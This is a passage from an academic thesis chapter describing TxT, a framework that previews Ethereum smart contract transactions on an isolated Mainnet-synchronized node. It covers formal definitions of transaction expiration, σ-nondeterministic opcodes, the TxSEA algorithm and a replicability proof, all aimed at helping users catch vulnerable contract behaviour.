we develop a smart contract testing framework called transaction encapsulation, which uses a fully-
synchronized Ethereum node to execute transactions, while preventing the propagation of these
transactions across the network. Transaction encapsulation classifies the transactions into two cate-
gories: σ-deterministic (with guaranteed test result), and σ-nondeterministic (with non-guaranteed
test result). To demonstrate the transaction incapsulation, we implement a distributed real-time
transaction tester called TxT, which successfully reveals the unexpected outcomes associated with
the majority of known smart contract vulnerabilities — significantly outperforming all existing
defense methods. Our evaluation shows that TxT exhibits a low rate of σ-nondeterministic transac-
tions. To further reduce the rate of σ-nondeterministic transactions, we enhance TxT functionality
to enable explicit detection of specific vulnerabilities in 75% of σ-nondeterministic transactions.
    To interact with the transaction framework, the user first connects their crypto wallet to a TxT
network and submits a transaction (or a sequence thereof) to the smart contract. Then, the user
observes in the wallet or dApp interface (if used) the exact outcome of the transaction(s), called
a posteriori state, manifested in cryptocurrency balances, token balances, error messages, etc. If
the result of the test execution matches the expectations, the user switches their wallet back to the
Ethereum Mainnet and submits the transaction as usual. While the user is testing and submitting
transactions, TxT is continuously checking in the background if the condition for the replicability
of the test transaction execution path still satisfies. Without the necessity to install new software
or learn contract programming, TxT allows everyday users to identify unexpected outcomes of
transaction sequences associated with the majority of known vulnerabilities, and it achieves a high
vulnerability coverage which more than doubles the coverage of all the state-of-the-art defense
tools combined.
    In summary, we deliver the following contributions:
     • We propose a new deterministic approach for smart contract verification, transaction encap-
       sulation, and design a distributed real-time dynamic transaction tester, TxT, to verify the
       security of transactions at runtime.
                                                  113


     • To address the time-of-check/time-of-use (TOCTOU) problem, we formally determine the
        exact set of conditions for the execution path replicability of a test transaction and implement
       TxT using a fully-synchronized Ethereum node to perform the transaction encapsulation.
     • We reproduce 37 known smart contract vulnerabilities and confirm that TxT can intercept
        83.8% of them, compared to only 40.5% by all the existing methods combined. We further
        evaluate 1.3 billion Ethereum transactions and confirm that 96.5% of them are suitable for
        security evaluation by TxT.
5.2: Background
Ethereum, dApps, and Wallets: Ethereum is a decentralized blockchain ecosystem that supports
the execution of smart contracts. Ethereum popularized the notion of decentralized application
(dApp) — a full-stack software product with a web or mobile interface as a frontend and smart
contract as a backend. In order for a dApp to interface with a smart contract and the Ethereum
network at large, it must use a wallet as an intermediary. The wallets securely store private key(s)
for signing and submitting transactions on the user’s behalf.
Smart Contracts and Transactions: Ethereum Virtual Machine (EVM) is a part of Ethereum that
executes smart contracts. As each transaction is executed by the EVM, the state of the blockchain
changes to reflect the executed transaction. However, if a given transaction is invalid, the EVM
reverts the blockchain to the state preceding this transaction. Essentially, an Ethereum transaction
is a state changing instruction signed by the sender using their private keys.
London Hard Fork and EIP-1559: There have been instances where Ethereum transactions were
included in the blocks paying very little or no gas at all. As of block 12,965,000, a hard fork
implementing several new Ethereum features was activated on the network. Dubbed “London”,
this hard fork changed how fees are collected by the Ethereum network. Ethereum Improvement
Proposal 1559 (EIP-1559), enforced in the London fork, changes the fee model in a way that it
practically prevents zero-priced transactions.
                                                   114


 1 contract Foo {
 2    function deposit () public payable {}
 3    function withdraw () public {
 4       address admin =
 5       0 xEc125A03C6F9E75BEB1A420e94d655B2f1352584 ;
 6       payable ( admin ). transfer (1000000000 wei);
 7       payable (msg. sender ). transfer ( address (this). balance );
 8    }
 9 }
                       Figure 5.1: A smart contract that fails only on Mainnet.
 1 contract Bar {
 2    constructor () public { }
 3 }
Figure      5.2:       A      non-payable      smart     contract   deployed     on     Mainnet     at
0xEc125A03C6F9E75BEB1A420e94d655B2f1352584. The same address on Ropsten testnet
is an externally owned account (EOA).
5.3: Motivating Example
Smart contracts do not operate in isolation; instead, they share with other smart contracts a dynamic
blockchain network environment. Moreover, the same blockchain platform can be represented
by several public blockchain networks, which sometimes affect the execution of the same smart
contract. Consider smart contract Foo in Fig. 5.1, which transfers funds to smart contract Bar
(Fig. 5.2). Bar is deployed on Mainnet, but not on Ropsten testnet. Moreover, Bar does not have
any payable functions, and therefore it cannot accept incoming Ether. As a result, the transfer in
line 6 (Fig. 5.1) will fail, reverting the entire transaction — but only on Mainnet, not on Ropsten.
Even if the states of all the variables of contract Foo on Ropsten are identical to their counterparts
on Mainnet, the behavior of the withdraw() function will be different. This example demonstrates
that the state of blockchain (denoted σ) is an important factor that determines the outcome of smart
contract execution.
    Next, we run a set of experiments to determine whether the existing smart contract defense
can reveal the failed transfer issue. We confirm that Securify [271], Oyente [200], Mythril [215],
Vandal [76], and Manticore [214] all fail to detect the issue, although some of them produce unre-
                                                    115


lated warnings. This example shows that some vulnerabilities might not be detected by the existing
defense methods. Moreover, the security evaluation on a testnet does not offer a sufficient reassur-
ance of contract safety. To address these issues, we propose a new defense approach for smart
contracts based on transaction testing. Our approach tests a transaction (or a series of transactions)
on an isolated fully-synchronized node, and then checks in real time whether the test transaction
can replicate exactly the same execution path on Mainnet. Unfortunately, most existing smart con-
tract threat mitigation solutions do not take the state of the current environment into account. The
solution proposed in this work tests the current state of smart contracts in the blockchain, thereby
providing a more accurate representation of contract behaviors.
5.4: Preliminaries
In this section, we introduce the transaction encapsulation approach, and then give an overview of
TxT tester, followed by formal conventions, assumptions, and threat model.
5.4.1: System Overview
Transaction Encapsulation: In this work, we propose a new transaction encapsulation framework
which offers a preview of the result of a transaction against the current state of Mainnet, but without
mining the transaction across the network. The transaction encapsulation executes one or a series
of transactions on an instrumented node fully-synchronized with the Mainnet network. Unlike
testnet simulations and symbolic executions, the transaction encapsulation enables the execution
of the transaction on the current state of Mainnet. The transaction encapsulation is designed not
only to execute the transaction but also to deterministically reason whether the transaction can be
replicated on Mainnet with completely identical execution path.
Overview of Transaction Testing Workflow: Fig. 5.3 shows the workflow of the TxT’s transac-
tion testing. To test a transaction with TxT, the user first switches the Ethereum network in their
wallet and specifies a custom transaction gas price. Then, the user submits a sequence of trans-
actions using their favorite wallet and dApp (if applies) — no other special-purpose software is
needed. When the transaction sequence is executed, the a posteriori state will be observable in
                                                  116


the wallet and/or in the dApp, as if the transaction was executed by the Mainnet. Next, the user
observes the status of the tested transaction (e.g., on a web page) to determine if the transaction is
testable and reproducible at any given moment.
    In some rare cases, TxT will not be able to guarantee the result of the transaction, in which
case the transaction will be labelled as σ-nondeterministic. Most σ-nondeterministic transactions
contain binary opcodes that are potentially associated with some known vulnerabilities — in this
case, TxT issues a warning about such a vulnerability. Otherwise, when the transaction is classified
as σ-nondeterministic and there is no vulnerability marker present among the binary opcodes, then
the transaction is deemed untestable.
    On the other hand, if the transaction is labeled σ-deterministic, it means that it is testable and
guarantees correct test result. In this case, the user observes the result of the transaction (e.g.,
balances in the wallet) to determine if the result of the transaction matches the expectation. If
the result is unexpected, obviously, the transaction should be abandoned by the user. If the result
matches the expectation, the user needs to verify whether or not the transaction has expired, i.e.,
whether there are other incoming transactions that change the state of the contract(s) during the
transaction testing. In some rare cases, TxT could determine that the test transaction has expired
by the time the user is ready to resubmit it to the Mainnet. Even in such a situation, the user
could retest the transaction. Conversely, if a TxT status shows that the transaction is still valid, the
user submits the transaction to the Mainnet knowing that the outcome will be identical to the one
observed during the corresponding transaction test.
5.4.2: Notation
Previous studies demonstrate that reproducing a smart contract vulnerability often requires a se-
quence of two or more transactions [122, 178, 214, 223, 260]. In this work, we use the notation
similar to the one in [260] to denote the sequence of N transactions as T ∗ :
                                     T ∗ = (T1 , · · · , TN ), N ≥ 1.
                                                    117


         Figure 5.3: Flow chart of transaction testing.  — requires manual user interaction.
Furthermore, without the loss of generality, we use a simplified43 notation of transaction adapted
from [113, 288]:
                         Ti = {Tn,i , Tp,i , Tg,i , To,i , Tt,i , Tv,i , Tf,i , Ta,i , Tb,i , Th,i , Tc,i },
where Tn,i is the transaction nonce, Tp,i is gas price, Tg,i is gas offer, To,i is the transaction sender
address, Tt,i is transaction recipient (destination address), Tv,i is the transaction value (the amount
of Wei sent along with the transaction), Tf,i is the invoked function of the smart contract, Ta,i is the
set of arguments with which Tf,i is invoked, Tb,i is the block the transaction is mined into, Th,i is
the transaction hash, and Tc,i is the sequence of EVM opcodes in the execution stack of Ti , which
recursively includes the opcode sequences of all the inter-contract calls (ICCs) executed by the
   43
      We simplify the definition by removing fields irrelevant to this study, such as (v, r, s) components of the transaction
signature.
                                                             118


transaction. We assume that Ti is properly signed.
5.4.3: Assumptions
A Posteriori State Assessment: Unlike traditional defense methods, TxT does not detect vulner-
able or malicious code patterns; instead, TxT reveals suspicious behavior associated with these
vulnerabilities. Specifically, we make a reasonable assumption that the user can assess whether the
outcome of a series of transactions is satisfactory or not. TxT will then give the user an accurate
preview of what will happen if the given transaction sequence is executed, and the user can use the
interface of the wallet and/or the dApp to assess the a posteriori state in the form of Ether balances,
token balances, dApp interface elements, transaction error messages, etc.
Transaction Sequences: We assume that all transactions in the sequence represent a single com-
plete logical workflow, such that the user can unambiguously assess its success or failure. For ex-
ample, a typical token exchange workflow can be logically represented as the following sequence:
¶ sell token A for stablecoin44 S; · buy token B using stablecoin S. In this example, the user ex-
pects to observe a specific amount of B tokens in their wallet. Also, we assume that all transactions
in the sequence are distinct and sent from the same account to the same contract, i.e.,
                                ∀Ti , Tj ∈ T ∗ , i 6= j : To,i = To,j ∧ Tt,i = Tt,j ,             (5.1)
where Ti , Tj are two transactions in the same sequence. We assume that the transactions in the
sequence are chronologically ordered. Since Ethereum uses incremental per-account nonces by
design [288], a testable transaction sequence must have nonces appearing in a strictly ascending
order, i.e.,
                               ∀Ti , Tj ∈ T ∗ : j = i + 1 =⇒ Tn,j = Tn,i + 1.
Finally, we define the requirement for Ethereum state transitions within the testable transaction
   44
      A token with market price pegged to a fiat currency (e.g., USD).
                                                          119


sequence:
                            ∀Ti , Tj ∈ T ∗ : j = i + 1 ∧ Ti 7→ Tj =⇒ ∄Tk :
                                                                                                    (5.2)
                                     ∗
                            Tk ∈/ T ∧ To,k = To,i ∧ Tn,k ∈ [Tn,1 , Tn,N ],
where Ti 7→ Tj denotes an EVM state transition when transaction Tj is executed after Ti within
the sequence, and ∄Tk indicates the non-existence of any transaction Tk that satisfies the following
criteria.
On-Chain Transactions: We assume that all the transactions tested by TxT are traditional on-
chain transactions, i.e., the transactions propagated, pooled, and mined by unmodified Ethereum
nodes, such as Go-Ethereum. The Decentralized Finance (DeFi) ecosystem, which has gained sig-
nificant traction in the recent years, is particularly sensitive to transaction ordering manipulation via
a widespread opportunistic exploration of Miner/Maximum Extractable Value (MEV) [30]. This
creates a pretext for transaction ordering attacks, such as sandwich front-running attack [118]. To
alleviate the negative consequences (e.g., gas fee inflation and increased network overhead) of
MEV transactions, the Flashbots project delivers a patch (MEV-Geth [29]) for the Go-Ethereum
node that allows DeFi participants to submit transactions directly to the patched nodes, which essen-
tially creates an off-chain overlay network for transaction propagation. In this work, we consider
orthodox Ethereum transactions, and leave the MEV-related transactions for future work.
5.4.4: Threat Model
In this work, we assume that Ethereum is secure and correct on the blockchain and consensus layers,
and the honest nodes correctly implement the protocol. The threat rests on the smart contract layer,
coming either from an attacker or from a non-adversarial bug. The attacker (if present) may either
be the one who introduces a security vulnerability in the smart contract, or they may be the one
who exploits a pre-existing program bug. The attacker aims at earning financial gains or causing
disruptions to the dApps. In all the cases, the attacking vector is a stand-alone Ethereum node or a
Ethereum API (such as Infura or Pocket Network).
                                                    120


5.5: TxT: Transaction Testing Framework
In this section, we describe the challenges and details of the TxT design, and illustrate the transac-
tion testing procedure.
5.5.1: Design Challenges
Ethereum is a dynamic ecosystem where anyone in the world can deploy smart contracts or submit
transactions that compete for being included into constantly appended blocks. This compositional
nature of Ethereum creates a number of practical challenges described below.
Challenge #1. TOCTOU Problem: The time-of-check/time-of-use (TOCTOU) problem is man-
ifested in TxT as the combination of the transaction expiration problem and the execution path
guarantee. Our analysis of Ethereum confirms the intuitive proposition that the execution path of
a transaction does not necessarily repeat that of an identical previously-submitted test transaction.
Every test transaction may sooner or later experience an “expiration” (i.e., the outcome of the test
transaction does not match that of the real transaction), after which it no longer demonstrates a valid
outcome of an identical transaction. In this work, we determine the exact set of conditions affect-
ing the expiration of a test transaction, and we further design TxSEA (Transaction State Expiration
Analyzer) algorithm, which could deterministically reason whether a test transaction has expired
or not (see Section 5.5.4 for more details). Our analysis of EVM execution reveals that Ethereum
smart contracts sometimes include data sources unrelated to transaction-based state transition. For
example, the Solidity property block.difficulty, represented by the DIFFICULTY EVM opcode,
is determined by mining instead of previous transactions. We call the presence of such data sources
σ-nondeterminism. If a transaction exhibits σ-nondeterminism in its execution stack, the transac-
tion is σ-nondeterministic. In this work, we determine the exact conditions for σ-nondeterminism,
and we design TxT in a way that it unambiguously detects σ-nondeterministic transactions. More-
over, TxT could scrutinize σ-nondeterministic transactions to provide a warning regarding specific
vulnerabilities associated with the σ-nondeterministic instructions in the contract.
Challenge #2. Execution Without Propagation: Transaction encapsulation requires that the test
                                                  121


transaction should only be executed on the instrumented TxT node, while being ignored by all
other nodes within the blockchain network. We show that the straw-man solutions, such as network
packet filtering or propagation suppression of the transaction, disrupt the synchronization and lead
to a stall of the node. To overcome this challenge, we propose transaction underpricing — a gas
price manipulation scheme, which effectively avoids the execution of transaction by the blockchain
network at large, without creating conditions in which the TxT node cannot re-synchronize with
the Mainnet after the test.
Challenge #3. Transaction Sequences: As demonstrated by previous studies [122, 178, 214, 223,
260], many vulnerabilities require executing a series of transactions for reproduction. To address
this challenge, we design TxT to retain the state of a soft fork for a set period of time after each
test transaction, in order to enable the execution of a sequence of transactions with an arbitrary
length. We enhance the TxSEA algorithm to determine the expiration of the entire sequence of
transactions.
5.5.2: Transaction Expiration
Determining a transaction expiration event is essential for the success of the proposed TxT tool;
otherwise, TxT cannot guarantee that the final real transaction(s) will produce the same result as
the test transaction(s). Here, we formally define the expiration conditions starting from transaction
expiration.
Definition 1: A transaction Ti is expired at block B if:
                        ∃Tj : Tt,i = Tt,j ∧ To,j 6= To,i ∧ Tb,j > Tb,i ∧ Tb,j ≤ B.                 (5.3)
Essentially, the transaction expiration stipulates the presence of at least one transaction Tj submitted
to the same smart contract as Ti (Tt,i = Tt,j ) from a different account than Ti (To,j 6= To,i ) at any
block time after Ti (Tb,j > Tb,i ) but before or at block B (Tb,j ≤ B). The following definition
asserts that for each block, the sets of expired and unexpired transactions are disjoint and form a
partition.
                                                    122


Definition 2: A transaction Ti is unexpired at block B if and only if it is not expired at block B.
    Following the definitions of transaction expiration, we define the expiration of a transaction
sequence as follows.
Definition 3: A sequence T ∗ is expired at block B if:
                                   ∃Ti ∈ T ∗ ∃Tj ∈ / T ∗ , To,j 6= To,i :
                                                                                                 (5.4)
                                   Tb,i < Tb,j ≤ B ∧ Tt,i = Tt,j .
Finally, we formally define the condition for an unexpired sequence of transactions.
Definition 4: A sequence T ∗ is unexpired at block B if:
                          ∀Ti ∈ T ∗ ∄Tj :
                                                                                                 (5.5)
                          To,j 6= To,i ∧ Tb,j > Tb,i ∧ Tb,j ≤ B ∧ Tt,i = Tt,j .
Intuitively, a transaction expiration event is characterized by the presence of another transaction
calling a function of the same smart contract after the test transaction. We assess the probability of
such an event in Section 5.6.3.
5.5.3: Sources of σ-nondeterminism
In order to determine all the sources of σ-nondeterminism on the Ethereum platform, we conduct an
exhaustive manual analysis of the current 145 EVM opcodes. In the end, we identify the following
set of opcodes incurring σ-nondeterminism:
                        T = {BLOCKHASH, NUMBER, COINBASE, GASLIMIT,
                        DIFFICULTY, TIMESTAMP, GASPRICE, BALANCE}.
Next, we elaborate on how these opcodes make the associated transaction σ-nondeterministic.
Block Hash: The BLOCKHASH opcode retrieves the block hash for a specified block number. Its
presence in the execution stack of a transaction is a sign that this transaction is σ-nondeterministic.
For example, if B is the most recently mined block, the BLOCKHASH opcode will return 0x0 for
                                                  123


B + 1 (i.e., the next block). However, one hour after that, the same code will return a non-zero
hash. Note that the BLOCKHASH opcode constitutes a signature of the “Weak Sources of Randomness
from Chain Attributes” (SWC-120) vulnerability.
Block Number: The NUMBER opcode retrieves the current block number. This variable constantly
increments, rendering any transaction that has this opcode in its bytecode to be σ-nondeterministic.
Also, this opcode is a marker for the “Block Values as a Time Proxy” (SWC-116) vulnerability.
Block Beneficiary Address: The block beneficiary address is the address specified by the winning
miner for receiving the reward. The COINBASE opcode retrieves the current block’s beneficiary
address. Since this value may be different between blocks, any transaction that uses this opcode
in its execution stack is σ-nondeterministic. Furthermore, this opcode is also a signature of the
SWC-120 vulnerability.
Block Gas Limit: Each Ethereum block has a limit on the cumulative gas consumption by all
its transactions. The GASLIMIT opcode returns the gas limit value. This value may vary from
block to block, and therefore the presence of the GASLIMIT opcode within the execution stack of
a transaction renders this transaction σ-nondeterministic. Additionally, this opcode constitutes a
signature of the SWC-120 vulnerability.
Block Difficulty: Each block has its own mining difficulty, which is calculated from the difficulty
of the previous block and the timestamp set by the miner, and therefore its specific value is volatile.
The DIFFICULTY opcode allows to retrieve the current block’s difficulty. The variability of block
difficulty is a clear sign that the transaction with the DIFFICULTY opcode in its execution stack is
σ-nondeterministic. This opcode is yet another signature of SWC-120.
Block Timestamp: The block timestamp is a value put in the block by the miner, and it may
not necessarily represent the exact time the block was mined. A contract can retrieve the block
timestamp value using the TIMESTAMP opcode. Intuitively, the value of block timestamp is not
expected to stay the same. Therefore, the presence of the TIMESTAMP opcode in the execution
stack of a transaction is not only indicative of the SWC-116 vulnerability potential, but it is also an
indicator that the transaction is σ-nondeterministic.
                                                   124


Third-party Account Balance: The BALANCE opcode retrieves the balance of an account. If an
account is not in the set {To,i , Tt,i }, we call it a third-party account. In this work, we analytically
determine that a third-party account balance incurs σ-nondeterminism in smart contracts. If some
account’s balance is updated by a transaction submitted to an account other than Tt,i , it does not
render Ti expired; however if this transaction contains a BALANCE opcode in its execution stack, the
transaction is marked as σ-nondeterministic.
Transaction Gas Price: The transaction gas price can be obtained via the GASPRICE opcode. Since
TxT uses transaction underpricing, the value retrieved by the GASPRICE opcode will differ between
the test transaction and the final one. Therefore, the presence of this opcode in the execution stack
of a transaction implies that this transaction is σ-nondeterministic. This opcode is another signature
of the SWC-120 vulnerability.
    Finally, by combining the above observations, we can establish the following definitions, start-
ing with the definition of a σ-deterministic transaction.
Definition 5: A transaction Ti is σ-deterministic if and only if Tc,i ∩ T = ∅.
    Since σ-deterministic and σ-nondeterministic transactions form a partition, the following defi-
nition ensues.
Definition 6: A transaction Ti is σ-nondeterministic if and only if it is not σ-deterministic.
    Similarly, we can further expand the definitions to include testing sequences.
Definition 7: A transaction sequence T ∗ is σ-deterministic if and only if all transaction in T ∗ are
σ-deterministic.
Definition 8: A transaction sequence T ∗ is σ-nondeterministic if at least one transaction in T ∗ is
σ-nondeterministic.
5.5.4: TxSEA Algorithm
Through transaction testing, TxT allows the user to peek into the a posteriori state of a transaction.
Unfortunately, a posteriori state is transient and can expire at any moment. Due to the other inter-
fering transactions, the execution path of the final transaction might not match that of the testing
                                                      125


  Algorithm 1: Dynamic TxSEA with Caching
    Data: The transaction expiration map E: ContractAddress 7→ LastTxBlock
  1 Procedure CacheTransaction(Tj ) begin
         Result: Cache the transaction currently processed by EVM and append it to the
                    permanent storage
         Input: Tj — currently executed transaction
  2      E[Tt,j ] ← Tb,j ;
  3 Function ExpirationTest(Ti ) begin
         Result: Test transaction expiration status
         Input: Ti — tested transaction
         Output: {Expired, Unexpired}
  4      if Tt,i ∈/ E.Keys then
  5          return Unexpired;
  6      else if E[Tt,i ] ≥ Tb,i then
  7          return Expired;
  8      else
  9          return Unexpired;
transaction. To address this issue, we develop the TxSEA algorithm for confirming the identical
execution path when the test transaction is submitted to the current block.
    Algorithm 1 shows an efficient implementation of TxSEA using caching and dynamic pro-
gramming. This algorithm introduces a constant-time procedure CacheT ransaction, which is
embedded into the instrumented Ethereum node and invoked for each executed transaction. This
procedure uses the map E to store the block number of the last transaction for each smart contract.
    The transaction data gathered from the node is stored in an outside storage (e.g., a database),
and this data is used by the ExpirationT est() function to determine if the transaction has expired.
This function uses the transaction expiration map to search for a transaction that might have been
recorded after Ti . The condition E[Tt,i ] ∈   / E.Keys checks whether the smart contract Tt,i has
any recorded transactions; if not, the transaction is obviously unexpired. Otherwise, we check if
the block associated with the last recorded transaction was mined simultaneously or after Tb,i (i.e.,
E[Tt,i ] ≥ Tb,i ), which indicates expiration. Finally, if the last transaction is recorded for the contract,
but it happened before Ti , the transaction is unexpired. Our experiments show that this algorithm
only experiences a negligible latency (see Section 5.6.6). The requirement for the additional storage
                                                   126


does not need an experimental evaluation because it will always occupy a fixed 52 bytes of storage
per transaction. As of November 2022, the size of the TxSEA cache is slightly over 86 gigabytes,
which is a small fraction of the size of the full node that requires hundreds of gigabytes.
5.5.5: How Does TxT Guarantee the Transaction Execution Path?
In the previous section, we demonstrate the cases in which TxT cannot guarantee that the execution
path of the final Mainnet transaction remains the same as that of the test transaction. Here, we
confirm that, with all the uncertain cases eliminated, the identical path execution can be guaranteed.
So far, we have been using a loose notion of transaction execution, which does not take into account
the state of blockchain the transaction applies to. Following the Ethereum state transition model
from [288], we can further define the formally precise definition of state-conditional execution
path as follows.
Definition 9: A state-conditional execution path, denoted Ti |σi , is the state transition σi → σi′ ,
such that σi′ = Υ(σi , Ti ), where Υ is the deterministic state transition function in EVM.
Definition 10: A state of contract Tt,i , denoted σt,i is a subset of state values in σi (i.e., σt,i ∈ σi ) that
encompass only storage and balances associated with all contracts in the call stack of transaction
Ti .
Definition 11: A contract-state-conditional execution path with respect to contract Tt,i , denoted
                                                 ′              ′
Ti |σi |Tt,i , is the state transition σt,i → σt,i , such that σt,i = Υ(σt,i , Ti ).
     Now that we have formal definitions of state-conditional execution path, contract state, and
contract-state-conditional execution path, consider the following theorem, which formalizes the
exact condition of replicability of a transaction execution path.
Theorem 1: Given two transactions Ti and Tj , if Tn,i = Tn,j , Tg,i = Tg,j , To,i = To,j , Tt,i =
Tt,j , Tv,i = Tv,j , Tf,i = Tf,j , Ta,i = Ta,j , Tc,i = Tc,j , Tc,i ∈
                                                                    / T , and Ti is not expired at block Tb,j ,
then Ti |σi |Tt,i = Tj |σj |Tt,j , i.e., Tj exhibits an identical execution path as Ti within the call stack
of Tt,i and conditional to states σj and σi , respectively, for all j > i.
                                                             ′      ′
Proof: By definition, Ti |σi |Tt,i = Tj |σj |Tt,j =⇒ σt,i       = σt,j =⇒ Υ(σt,i , Ti ) = Υ(σt,j , Tj ). Since
                                                        127


                      ′                                             ′
Υ is deterministic, σt,i depends solely upon σt,i and Ti , while σt,j   depends solely upon σt,j and Tj .
    As per Ethereum and EVM specifications [20, 21, 288], the execution of a transaction calling
a function of a smart contract is determined only by the following four components: 1) the code
of the smart contract, as well as the code of the other contracts invoked within the call stack of
the transaction; 2) the storage of the target smart contract, as well as the storage of all contracts
within the call stack of the current transaction; 3) balances of smart contracts and EOAs; 4) block-
related values. Next, we prove that none of these components could prevent Tj , applied to σt,j ,
from executing the exactly same path as Ti , when applied to σt,i , while satisfying the Theorem’s
constraints.
    Since Tc,i = Tc,j , the code of all contracts in the call stack is identical, and therefore this com-
ponent is incapable of creating a discrepancy between Ti |σi |Tt,i and Tj |σj |Tt,j . As per Definitions
1 and 2, the pre-condition that Ti is not expired at block Tb,j implies that Tt,i has no incoming
transactions to Tt,i between the timestamps of blocks Tb,i and Tb,j , i.e.:
                                ∄Tk : To,j 6= To,i =⇒
                                                                                                     (5.6)
                                Tb,k > Tb,i ∧ Tb,k ≤ Tb,j ∧ Tt,i = Tt,k .
Since Tc,i = Tc,j and the contract storage can only be altered through an incoming transaction ,
Eq. (5.6) effectively eliminates contract storage discrepancy between states σt,i and σt,j . Therefore,
a contract storage could not create a discrepancy between Ti |σi |Tt,i and Tj |σj |Tt,j .
    Similarly, altering a contract’s balance is only possible through transactions, mining, or self-
destruction. Specifically, the balance increase requires a transaction calling a payable function with
a non-zero value. The balance decrease requires a transfer of Ether performed by the smart contract
code. The mining reward involves updating of the coinbase parameter of the block, which makes it
a block-related parameter as discussed later. The self-destruction is only possible by executing the
SELFDESTRUCT opcode in the smart contract code initiated via a transaction. Therefore, Eq. (5.6)
also excludes any balance transfer. Moreover, since Tc,i ∈  / T , the balance checks for other accounts
are also excluded. Therefore, balances also could not create a discrepancy between Ti |σi |Tt,i and
                                                   128


Tj |σj |Tt,j . Finally, all block-related values are included in T . As established earlier, Tc,i = Tc,j ,
and thus Tc,i ∈  / T      =⇒ Tc,j ∈   / T . Therefore, block values cannot create a discrepancy between
Ti |σi |Tt,i and Tj |σj |Tt,j under the set constraints.
      In summary, we see that the code of the transaction call stack, the storage of the target smart
contract and all contracts within the call stack of the current transaction, balances of smart con-
tracts and EOAs, and block-related values are unable to create a discrepancy between Ti |σi |Tt,i and
Tj |σj |Tt,j . Therefore, Ti |σi |Tt,i ≡ Tj |σj |Tt,j . ■
      The set of constraints in Theorem 1 is the sufficient condition for guaranteed replicability of
a test transaction, which is used by TxT and TxSEA. Specifically, we prove that σ-deterministic
unexpired transactions guarantee the replicability of a testing transaction execution path.
5.5.6: Temporal Separation of Transactions
Some smart contracts force transaction separation by a time gap. For example, an investment
scheme might require a delayed withdrawal of dividends. In this work, we analytically determine
that it is impossible to enforce time separation without incurring σ-nondeterminism or transaction
sequence expiration, which we can summarize in the following theorem.
Theorem 2: Inter-transaction time separation stipulation in a sequence T ∗ implies that T ∗ is σ-
nondeterministic or it is bound to expire before block Tb,N .
Proof: The time separation stipulation means that it is impossible to complete the transaction se-
quence without awaiting a certain event or condition between a pair of subsequent transactions.
Without the loss of rigor, we assume that the minimum inter-transaction separation time quantum
is equal to one block45 . This reduction allows us to define the transaction time separation stipulation
as follows:
                             ∃Ti , Tj ∈ T ∗ : Tb,i = α ∧ Tb,j = β ∧ Tn,j = Tn,i + 1
                              =⇒ β > α.
This condition is indicative of either of the following three circumstances regarding Ti and Tj :
1) The cumulative gas consumption of Ti and Tj exceeds the block’s gas limit; 2) There is at
   45
      On average, it takes 10 to 20 seconds in Ethereum to mine a new block.
                                                         129


least one other transaction Tk expected before the block α; 3) The state of blockchain σ must
meet a certain condition before α. Indeed, outside of these three conditions, there is no other
circumstance preventing Ti and Tj with different nonces to share a block. The first condition is
automatically prevented by Ethereum by mining one of the transactions in one of the following
blocks, but this adaptive behavior is not stipulated because the block size is variable and may or
may not exceed the cumulative gas consumption of Ti and Tj . The second case precisely matches
Definition 3, and therefore incurs the expiration of sequence T ∗ . The third case satisfies Definition
6 (and subsequently Definition 5) — which means that in this case Ti is σ-nondeterministic, and by
Definition 8 it means that T ∗ is σ-nondeterministic. Therefore, the inter-transaction time separation
implies either σ-nondeterminism or expiration of T ∗ ■
Corollary of Theorem 2: If a transaction sequence requires a time separation between transac-
tions, this sequence is untestable, potentially vulnerable, or it will expire before the execution of
its last transaction. Therefore, transaction sequences that require time separation between trans-
actions cannot be tested by TxT.
5.5.7: Transaction Execution on an Instrumented Node
Here, we outline some straw-man approaches that might be considered as alternative design choices
for TxT. However, all these approaches suffer from some limitations as illustrated below.
Gossip Delivery: TxT requires the user to switch to TxT network for transaction testing. It would
be reasonable to consider delivering the test transaction through the normal Ethereum node based
on the assumption that any transaction, even the one deemed for failure, must arrive at every node in
the network, so that all the nodes could make their own independent rejection judgement. However,
our experiments show that this assumption is not always correct. Our extensive experiments with
transaction underpricing show that the nodes often refuse to forward transactions that do not pass
certain “smoke tests” (e.g., minimum gas price), so we cannot rely on the Ethereum gossip protocol
for delivering the test transaction to the TxT node.
Network-layer Propagation Inhibition: We assume that the user has a subscription with a TxT
                                                 130


provider. This allows the provider to compare the from field of the transaction message with the
user database to filter outgoing network packets containing test transactions. However, our exper-
iments show that the attempts to tamper with Ethereum network traffic cause some unpredictable
behavior, such as node stalling and various synchronization errors. Even if we could overcome
these errors by reverse-engineering the software (Go Ethereum, in our case), the reliance on eccen-
tricities of a specific implementation of Ethereum node is not only extremely complicated, but it
could also involve some unforeseeable errors. Thus, we choose to prevent the transaction propaga-
tion through the less intrusive method of transaction underpricing. Moreover, since the wallets ask
users to select the transaction gas price anyway, the requirement to specify a low gas price does not
create a noticeable inconvenience.
Submit Final Transaction via TxT: If a TxT test confirms the safety of a transaction, the user is
required to reconnect to the Mainnet network for submitting the final transaction. This step raises
a question: would it be easier to submit the final transaction through TxT instead, as the TxT node
is essentially a Mainnet node? Unfortunately, this approach might be less convenient for the user
than the one proposed in our design. Submitting the final transaction through TxT would require
pruning and re-synchronizing the TxT node to remove the test transaction from it, which takes some
time; since tested transactions, as we know, are prone to expiration, any unreasonable delay should
be eliminated.
Our TxT Design with Transaction Underpricing: TxT requires the isolated execution of trans-
actions on a fully-synchronized node. We run multiple experiments to determine that the “forced”
solutions, such as gossip firewalling (suppression of transaction propagation), incur unrecoverable
node stalls. Moreover, any extensive modification of a TxT node creates sustainability issues: the
same modifications have to be applied to future releases of the node, resulting in an increased main-
tenance overhead. To overcome this challenge, we propose transaction underpricing — a gas price
manipulation scheme, which effectively avoids the execution of transaction by the blockchain net-
work at large, without creating conditions in which the TxT node cannot re-synchronize with the
Mainnet after the test. To override the rejection of transaction, we enable --miner.gasprice 1
                                                 131


                             Figure 5.4: The workflow of TxT testing.
CLI option in Go-Ethereum which effectively overrides the underpriced transaction checks. Since
the London Fork, Ethereum enforces the EIP-1559 proposal [79], which effectively prevents mining
transactions with very low gas price, making the concern about accidental mining of underpriced
transactions unsubstantiated.
5.5.8: Putting It All Toghether
Fig. 5.4 shows a successful testing of a single transaction. Without the loss of generality, the same
workflow can be applied to a series of two or more transactions. We assume that the user has
an Ethereum wallet with an account and some positive Ether balance. By specifying the minimal
positive gas price of 1 wei/gas, it would require the user to have only 1.35 · 10−7 USD worth of
Ether (as of November 2021) for a worst-case transaction consuming the entire block gas limit. We
                                                 132


also assume that the user submits a transaction either directly to a smart contract, or uses a dApp as
a front-end for a smart contract (with the wallet connected to this dApp). Next, we describe each
